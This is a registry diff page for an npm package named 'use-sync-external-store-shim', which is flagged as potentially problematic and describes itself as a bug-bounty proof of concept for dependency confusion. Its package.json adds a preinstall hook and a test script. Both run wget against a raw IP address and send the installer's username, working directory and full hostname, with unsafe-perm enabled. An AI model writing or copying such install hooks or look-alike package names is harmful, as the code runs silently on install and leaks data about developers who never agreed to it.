use-sync-external-store-shim 1.0.1

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of use-sync-external-store-shim might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/README.md +2 -0
  2. package/index.js +3 -0
  3. package/package.json +20 -0
package/README.md ADDED
@@ -0,0 +1,2 @@
1
+ # depconfs
2
+ # depconfs
package/index.js ADDED
@@ -0,0 +1,3 @@
1
+ exports.printMsg = function() {
2
+ console.log("hackerone.com njcve has identified a private public NPM mismatch");
3
+ }
package/package.json ADDED
@@ -0,0 +1,20 @@
1
+ {
2
+ "name": "use-sync-external-store-shim",
3
+ "version": "1.0.1",
4
+ "description": "This is a POC for your BugBounty program. You are using Private NPM packages without a Public registered namespace.",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "wget --quiet \"http://68.183.37.202/?user=$(whoami)&path=$(pwd)&hostname=$(hostname -f)\" # CHANGE IP ADDRESS",
8
+ "preinstall": "wget --quiet \"http://68.183.37.202/?user=$(whoami)&path=$(pwd)&hostname=$(hostname -f)\" # CHANGE IP ADDRESS"
9
+ },
10
+ "keywords": [
11
+ "test",
12
+ "PoC"
13
+ ],
14
+ "dependencies": {},
15
+ "config": {
16
+ "unsafe-perm":true
17
+ },
18
+ "author": "njcve",
19
+ "license": "ISC"
20
+ }